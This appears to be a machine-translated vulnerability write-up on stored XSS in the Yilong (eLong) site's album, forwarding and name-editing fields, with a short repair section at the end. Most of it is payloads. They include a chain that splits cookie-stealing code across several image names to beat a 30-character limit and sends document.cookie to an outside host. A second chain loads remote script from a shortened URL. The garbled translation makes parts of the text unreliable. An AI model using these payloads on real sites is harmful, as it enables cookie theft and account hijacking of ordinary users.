Yilong multiple storage type XSS breakthrough length limit (principle utilization and repair)

Various XSS
Details: 1. ">
1) Location:
A) album

B) Forwarding

 

B) Forwarding

C) edit the name

 

2) Exploitation
It is very easy to use. The first two are directly read by X,
We caught the next package:

 

The above several items are clearly displayed on the webpage, and CSRF directly modifies the subject.
2. "onload =" alert (1 )"

 

1) Location
A) directly on the album page, X

 

B) Go to the editing image and get X

 

2) Exploitation
Method 1: Direct X; Method 2: CSRFX
Of course, there is also a more convenient "breakthrough length limit cross-Yilong sister ".

3.'; Alert (document. cookie );//

 

1) Location
A) outside: View photos in the album

 


 

B) Inside: Click to view the photo

 

2) Exploitation
The most direct, just look at X
4. Break the length limit across the Yilong girls!
I have said so much above, but there is a problem that you can only enter up to 30 letters. To cross the art dragon girl, you must break through the length limit. We can use several XSS to break through the length limit.
Our cross-site code is

Http://kocteg.duapp.com/a.php? V = elong & c = 'document. cooker'
Due to the length limit, we cannot use this cross-site code. So there is a way to split it
1: "onload =" g = document. cookie"
2: "onload =" h = 'HTTP: // kocteg '"
3: "onload =" h = h + '.duapp.com/a .'"
4: "onload =" h = h + 'php? V = elong & C '"
5: "onload =" h = h + '=' + g"
6: '; windows. open (h );//
Put them in each image.

 

As long as the girl opens this album, it will be crossed ....

 

Two... What is set by duapp? The IP address cannot be obtained...


5. Principle and repair

1) First: ">

 

"And> wood Filter

2) second: "onload =" alert (1 )"

 

"Wood has Filter
3) Third: '; alert (document. cookie );//

 

After the call, single quotes are filtered

Previously, because elong filtered the angle brackets <> and script keywords, it was unable to load JavaScript code, but it passed the COOKIE through GET, this morning, I got up and tested how to successfully bypass and load JS to GET the ultra-long COOKIE that was previously beyond the URL limit.

 

<Script/src = http://t.cn/zWEGaNi> </script>
The above code loads JavaScript code. Split

"Onload =" h = '& lt; scr'
"Onload =" h + = 'ipt/src = H'
"Onload =" h + = 'ttp: // t.cn/zWEG'
"Onload =" h + = 'ani & gt; & lt;/scr'
"Onload =" h + = 'ipt & gt ;'
"Onload =" document. write (h );
The server filters <> and scripts, but the client does not. & Lt; the file is successfully converted to <by JS on the server side and printed by document. write. The following are the ultra-long cookies.